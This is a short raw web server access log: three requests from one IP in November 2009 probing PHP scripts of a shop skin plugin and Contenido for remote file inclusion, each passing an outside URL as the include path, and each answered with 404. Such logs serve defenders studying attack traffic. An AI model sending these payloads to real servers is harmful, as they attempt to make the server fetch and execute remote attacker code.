202.123.212.188 - - [13/Nov/2009:00:51:29 -0500] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:00:51:45 -0500] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:00:51:45 -0500] "GET /logs/access_log.Q109082500%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
